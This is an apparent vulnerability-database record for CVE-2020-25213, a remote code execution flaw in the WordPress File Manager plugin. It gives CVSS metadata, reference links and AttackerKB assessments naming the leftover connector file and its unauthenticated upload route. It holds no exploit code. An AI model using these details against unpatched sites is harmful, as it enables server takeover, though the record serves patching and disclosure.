ID CVE-2020-25213 Type cve Reporter cve@mitre.org Modified 2020-11-10T17:15:00
Description
The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.
{"id": "CVE-2020-25213", "bulletinFamily": "NVD", "title": "CVE-2020-25213", "description": "The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.", "published": "2020-09-09T16:15:00", "modified": "2020-11-10T17:15:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-25213", "reporter": "cve@mitre.org", "references": ["https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "https://wordpress.org/plugins/wp-file-manager/#developers", "https://github.com/w4fz5uck5/wp-file-manager-0day", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "https://plugins.trac.wordpress.org/changeset/2373068", "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html"], "cvelist": ["CVE-2020-25213"], "type": "cve", "lastseen": "2021-04-23T01:09:38", "edition": 9, "viewCount": 82, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "githubexploit", "idList": ["6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED", "21A5FEEE-9C4D-52D3-BCE6-7EABF0888631"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0869"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "zdt", "idList": ["1337DAY-ID-35215"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-04-23T01:09:38", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}], "modified": "2021-04-23T01:09:38"}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-04-23T01:09:38", "rev": 2}, "twitter": {"counter": 28, "tweets": [{"link": "https://twitter.com/XopxeCG/status/1358903419994570752", "text": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213) https://t.co/ZLxlYOLA9h?amp=1"}, {"link": "https://twitter.com/UpsidedownCanuk/status/1358930208934424576", "text": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213)\nhttps://t.co/1J31cDM3SY?amp=1"}, {"link": "https://twitter.com/VulmonFeeds/status/1369454538177011714", "text": "CVE-2020-25213\n\nThe File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to ha...\n\nhttps://t.co/Nf5iblcMjP?amp=1"}, {"link": "https://twitter.com/UpsidedownCanuk/status/1358931800635056129", "text": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213) posted by AlienVault on /alienvault OTX: /pulse/6021a425750b50dafcc48a26/"}, {"link": "https://twitter.com/PVynckier/status/1361545905615351808", "text": "CVE-2020-25213: Critical Vulnerability in File Manager WordPress Plugin Exploited in the Wild - Blog | Tenable\u00ae"}, {"link": "https://twitter.com/hackingcoil/status/1359157041080713222", "text": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213) \nFebruary 7, 2021\n/hashtag/Malware_updates?src=hashtag_click\nhttps://t.co/7M3Ro4ZFZ2?amp=1"}, {"link": "https://twitter.com/DeliveredDATA/status/1358886320295313409", "text": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213) https://t.co/PAw6pBzf2e?amp=1"}, {"link": "https://twitter.com/F5Labs/status/1390011935358394371", "text": "Web attacks against Argentina, Brazil, Chile, Colombia, and Panama are looking for CVE-2020-15505, CVE-2017-9841, CVE-2020-25213, CVE-2018-20062, CVE-2020-20578, and many more. /hashtag/Latin?src=hashtag_click America. Story from /dunsany and Malcolm Heath. https://t.co/qtacjjJMu2?amp=1"}, {"link": "https://twitter.com/F5Labs/status/1391513334743244805", "text": "Web attacks against Argentina, Brazil, Chile, Colombia, and Panama are looking for CVE-2020-15505, CVE-2017-9841, CVE-2020-25213, CVE-2018-20062, CVE-2020-20578, and many more. /hashtag/Latin?src=hashtag_click America. Story from /dunsany and Malcolm Heath. https://t.co/Faql9DIUY3?amp=1"}, {"link": "https://twitter.com/VulmonFeeds/status/1428679573261242368", "text": "CVE-2020-25213\n\nThe File Manager (wp-file-manager) plugin before 6.9 for WordPress allow...\n\nhttps://t.co/Nf5iblcMjP?amp=1\n\nVulnerability Notification: https://t.co/xhLrNnfyrO?amp=1"}], "modified": "2021-04-23T01:09:38"}, "vulnersScore": 6.2}, "cpe": [], "affectedSoftware": [{"cpeName": "webdesi9:file_manager", "name": "webdesi9 file manager", "operator": "lt", "version": "6.9"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpe23": [], "cwe": ["CWE-434"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:webdesi9:file_manager:6.9:*:*:*:*:wordpress:*:*", "cpe_name": [], "versionEndExcluding": "6.9", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "refsource": "MISC", "tags": ["Third Party Advisory", "Press/Media Coverage"], "url": "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/"}, {"name": "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/"}, {"name": "https://wordpress.org/plugins/wp-file-manager/#developers", "refsource": "MISC", "tags": ["Third Party Advisory", "Product"], "url": "https://wordpress.org/plugins/wp-file-manager/#developers"}, {"name": "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/"}, {"name": "https://plugins.trac.wordpress.org/changeset/2373068", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://plugins.trac.wordpress.org/changeset/2373068"}, {"name": "https://github.com/w4fz5uck5/wp-file-manager-0day", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://github.com/w4fz5uck5/wp-file-manager-0day"}, {"name": "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html"}, {"name": "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html"}], "immutableFields": []}
{"attackerkb": [{"id": "AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197", "hash": "dca3e5b854cc784b944681b673f17df699f94f4fe93979ed4e0947ae574e2bb3", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2020-25213", "description": "The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.\n\n \n**Recent assessments:** \n \n**space-r7** at November 10, 2020 3:10pm UTC reported:\n\nRating this as very high as this is a widespread Wordpress plugin, and the vulnerability is easily exploitable. The vulnerability is due to an example file, `lib/php/connector.minimal.php`, being left over in installations of the plugin. The file enables unauthenticated execution of select commands including an `upload` command that allows for file upload which can lead to code execution on the server.\n\nNote that disabling the plugin in Wordpress does not fix the vulnerability. The plugin should either be removed or updated to the patched version, which is `v6.9`.\n\n**wvu-r7** at September 29, 2020 8:28pm UTC reported:\n\nRating this as very high as this is a widespread Wordpress plugin, and the vulnerability is easily exploitable. The vulnerability is due to an example file, `lib/php/connector.minimal.php`, being left over in installations of the plugin. The file enables unauthenticated execution of select commands including an `upload` command that allows for file upload which can lead to code execution on the server.\n\nNote that disabling the plugin in Wordpress does not fix the vulnerability. The plugin should either be removed or updated to the patched version, which is `v6.9`.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "published": "2020-09-09T00:00:00", "modified": "2020-09-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://attackerkb.com/topics/biVgLIkiSE/cve-2020-25213", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213", "https://wordpress.org/plugins/wp-file-manager#developers", "https://github.com/w4fz5uck5/wp-file-manager-0day", "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin", "https://plugins.trac.wordpress.org/changeset/2373068", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug", "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager", "https://wordpress.org/plugins/wp-file-manager/#developers", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html"], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-07-20T20:13:13", "history": [{"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2020-25213"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "description": "The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.\n\n \n**Recent assessments:** \n \n**space-r7** at November 10, 2020 3:10pm UTC reported:\n\nRating this as very high as this is a widespread Wordpress plugin, and the vulnerability is easily exploitable. The vulnerability is due to an example file, `lib/php/connector.minimal.php`, being left over in installations of the plugin. The file enables unauthenticated execution of select commands including an `upload` command that allows for file upload which can lead to code execution on the server.\n\nNote that disabling the plugin in Wordpress does not fix the vulnerability. The plugin should either be removed or updated to the patched version, which is `v6.9`.\n\n**wvu-r7** at September 29, 2020 8:28pm UTC reported:\n\nRating this as very high as this is a widespread Wordpress plugin, and the vulnerability is easily exploitable. The vulnerability is due to an example file, `lib/php/connector.minimal.php`, being left over in installations of the plugin. The file enables unauthenticated execution of select commands including an `upload` command that allows for file upload which can lead to code execution on the server.\n\nNote that disabling the plugin in Wordpress does not fix the vulnerability. The plugin should either be removed or updated to the patched version, which is `v6.9`.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-07-20T20:13:13", "references": [{"idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:160003"], "type": "packetstorm"}, {"idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"], "type": "rapid7blog"}, {"idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"], "type": "wpexploit"}, {"idList": ["E-722"], "type": "dsquare"}, {"idList": ["CVE-2020-25213"], "type": "cve"}, {"idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2021-07-20T20:13:13", "rev": 2, "value": 5.8, "vector": "NONE"}}, "hash": "17f8cea0a9e475320e2cbe212298681cae098aa759b85898ebcb2fb594c976ff", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "221ab2ce946e814b2b24224dd073a53c", "key": "cvelist"}, {"hash": "c75fb6b597902e8878f1273c1e36f810", "key": "published"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "5ee76a18a6402acc9c84716efee54e94", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "546c565f15d39112a415245a0944ee70", "key": "references"}, {"hash": "5e5266bea17c39e5ee12abd5fcbf7c2b", "key": "reporter"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "4be5b1bb426d67d5e45988ae1eae6d67", "key": "description"}, {"hash": "405aaa07cd67ac97a21d1fa072e563ce", "key": "title"}, {"hash": "dbbc8fce9a59d0a898c44c4f99244f4a", "key": "type"}, {"hash": "fbbb237030b5b01a8d582548db2e5f9d", "key": "modified"}], "history": [], "href": "https://attackerkb.com/topics/biVgLIkiSE/cve-2020-25213", "id": "AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197", "immutableFields": [], "lastseen": "2021-07-20T20:13:13", "modified": "2020-09-15T00:00:00", "objectVersion": "1.5", "published": "2020-09-09T00:00:00", "references": ["https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager", "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html", "https://wordpress.org/plugins/wp-file-manager#developers", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "https://wordpress.org/plugins/wp-file-manager/#developers", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin", "https://github.com/w4fz5uck5/wp-file-manager-0day", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "https://plugins.trac.wordpress.org/changeset/2373068", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213", "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html"], "reporter": "AttackerKB", "title": "CVE-2020-25213", "type": "attackerkb", "viewCount": 1}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2021-07-20T20:13:13"}, {"bulletin": {"attackerkb": {"attackerValue": 5, "exploitability": 5}, "bulletinFamily": "info", "cvelist": ["CVE-2020-25213", "CVE-2020-17382"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.\n\n \n**Recent assessments:** \n \n**space-r7** at November 10, 2020 3:10pm UTC reported:\n\nRating this as very high as this is a widespread Wordpress plugin, and the vulnerability is easily exploitable. The vulnerability is due to an example file, `lib/php/connector.minimal.php`, being left over in installations of the plugin. The file enables unauthenticated execution of select commands including an `upload` command that allows for file upload which can lead to code execution on the server.\n\nNote that disabling the plugin in Wordpress does not fix the vulnerability. The plugin should either be removed or updated to the patched version, which is `v6.9`.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**wvu-r7** at September 29, 2020 8:28pm UTC reported:\n\nRating this as very high as this is a widespread Wordpress plugin, and the vulnerability is easily exploitable. The vulnerability is due to an example file, `lib/php/connector.minimal.php`, being left over in installations of the plugin. The file enables unauthenticated execution of select commands including an `upload` command that allows for file upload which can lead to code execution on the server.\n\nNote that disabling the plugin in Wordpress does not fix the vulnerability. The plugin should either be removed or updated to the patched version, which is `v6.9`.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "enchantments": {"dependencies": {"modified": "2021-03-13T15:18:30", "references": [{"idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:160003", "PACKETSTORM:159315"], "type": "packetstorm"}, {"idList": ["CVE-2020-25213", "CVE-2020-17382"], "type": "cve"}, {"idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"], "type": "rapid7blog"}, {"idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"], "type": "wpexploit"}, {"idList": ["EDB-ID:48836"], "type": "exploitdb"}, {"idList": ["AKB:434CECFE-43DC-4446-9C55-3EDFD6742827"], "type": "attackerkb"}, {"idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2021-03-13T15:18:30", "rev": 2, "value": 5.9, "vector": "NONE"}}, "hash": "997fb83510b0b4f546e0ef18f18ccba3", "history": [], "href": "https://attackerkb.com/topics/biVgLIkiSE/cve-2020-25213", "id": "AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197", "immutableFields": [], "last_activity": null, "lastseen": "2021-03-13T15:18:30", "mitre_vector": {}, "modified": "2020-09-15T00:00:00", "objectVersion": "1.4", "published": "2020-09-09T00:00:00", "references": ["https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager", "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html", "https://wordpress.org/plugins/wp-file-manager#developers", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "https://wordpress.org/plugins/wp-file-manager/#developers", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin", "https://github.com/w4fz5uck5/wp-file-manager-0day", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "https://plugins.trac.wordpress.org/changeset/2373068", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213", "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html"], "references_categories": {}, "reporter": "AttackerKB", "tags": [], "title": "CVE-2020-25213", "type": "attackerkb", "viewCount": 0, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["cvelist"], "edition": 3, "lastseen": "2021-03-13T15:18:30"}, {"bulletin": {"attackerkb": {"attackerValue": 5, "exploitability": 5}, "bulletinFamily": "info", "cvelist": ["CVE-2020-25213"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.\n\n \n**Recent assessments:** \n \n**space-r7** at November 10, 2020 3:10pm UTC reported:\n\nRating this as very high as this is a widespread Wordpress plugin, and the vulnerability is easily exploitable. The vulnerability is due to an example file, `lib/php/connector.minimal.php`, being left over in installations of the plugin. The file enables unauthenticated execution of select commands including an `upload` command that allows for file upload which can lead to code execution on the server.\n\nNote that disabling the plugin in Wordpress does not fix the vulnerability. The plugin should either be removed or updated to the patched version, which is `v6.9`.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**wvu-r7** at September 29, 2020 8:28pm UTC reported:\n\nRating this as very high as this is a widespread Wordpress plugin, and the vulnerability is easily exploitable. The vulnerability is due to an example file, `lib/php/connector.minimal.php`, being left over in installations of the plugin. The file enables unauthenticated execution of select commands including an `upload` command that allows for file upload which can lead to code execution on the server.\n\nNote that disabling the plugin in Wordpress does not fix the vulnerability. The plugin should either be removed or updated to the patched version, which is `v6.9`.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "enchantments": {"dependencies": {"modified": "2021-07-01T15:36:11", "references": [{"idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:160003"], "type": "packetstorm"}, {"idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"], "type": "rapid7blog"}, {"idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"], "type": "wpexploit"}, {"idList": ["E-722"], "type": "dsquare"}, {"idList": ["CVE-2020-25213"], "type": "cve"}, {"idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2021-07-01T15:36:11", "rev": 2, "value": 5.6, "vector": "NONE"}}, "hash": "8c1297461d583f5a1311a62fc723a46b", "history": [], "href": "https://attackerkb.com/topics/biVgLIkiSE/cve-2020-25213", "id": "AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197", "immutableFields": [], "last_activity": "2000-01-01T10:00:00", "lastseen": "2021-07-01T15:36:11", "mitre_vector": {}, "modified": "2020-09-15T00:00:00", "objectVersion": "1.6", "published": "2020-09-09T00:00:00", "references": ["https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager", "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html", "https://wordpress.org/plugins/wp-file-manager#developers", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "https://wordpress.org/plugins/wp-file-manager/#developers", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin", "https://github.com/w4fz5uck5/wp-file-manager-0day", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "https://plugins.trac.wordpress.org/changeset/2373068", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213", "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html"], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213"], "Miscellaneous": ["https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager", "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html", "https://wordpress.org/plugins/wp-file-manager#developers", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "https://wordpress.org/plugins/wp-file-manager/#developers", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin", "https://github.com/w4fz5uck5/wp-file-manager-0day", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "https://plugins.trac.wordpress.org/changeset/2373068", "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html"]}, "reporter": "AttackerKB", "tags": ["easy_to_develop", "default_configuration", "pre_auth"], "title": "CVE-2020-25213", "type": "attackerkb", "viewCount": 1, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["last_activity", "description"], "edition": 6, "lastseen": "2021-07-01T15:36:11"}, {"bulletin": {"attackerkb": {"attackerValue": 5, "exploitability": 5}, "bulletinFamily": "info", "cvelist": ["CVE-2020-25213"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.\n\n \n**Recent assessments:** \n \n**space-r7** at November 10, 2020 3:10pm UTC reported:\n\nRating this as very high as this is a widespread Wordpress plugin, and the vulnerability is easily exploitable. The vulnerability is due to an example file, `lib/php/connector.minimal.php`, being left over in installations of the plugin. The file enables unauthenticated execution of select commands including an `upload` command that allows for file upload which can lead to code execution on the server.\n\nNote that disabling the plugin in Wordpress does not fix the vulnerability. The plugin should either be removed or updated to the patched version, which is `v6.9`.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**wvu-r7** at September 29, 2020 8:28pm UTC reported:\n\nRating this as very high as this is a widespread Wordpress plugin, and the vulnerability is easily exploitable. The vulnerability is due to an example file, `lib/php/connector.minimal.php`, being left over in installations of the plugin. The file enables unauthenticated execution of select commands including an `upload` command that allows for file upload which can lead to code execution on the server.\n\nNote that disabling the plugin in Wordpress does not fix the vulnerability. The plugin should either be removed or updated to the patched version, which is `v6.9`.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "enchantments": {"dependencies": {"modified": "2021-05-06T15:18:39", "references": [{"idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:160003"], "type": "packetstorm"}, {"idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"], "type": "rapid7blog"}, {"idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"], "type": "wpexploit"}, {"idList": ["E-722"], "type": "dsquare"}, {"idList": ["CVE-2020-25213"], "type": "cve"}, {"idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2021-05-06T15:18:39", "rev": 2, "value": 5.6, "vector": "NONE"}}, "hash": "c50ccb68006625aeb208e176c3ebf3dc", "history": [], "href": "https://attackerkb.com/topics/biVgLIkiSE/cve-2020-25213", "id": "AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197", "immutableFields": [], "last_activity": null, "lastseen": "2021-05-06T15:18:39", "mitre_vector": {}, "modified": "2020-09-15T00:00:00", "objectVersion": "1.5", "published": "2020-09-09T00:00:00", "references": ["https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager", "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html", "https://wordpress.org/plugins/wp-file-manager#developers", 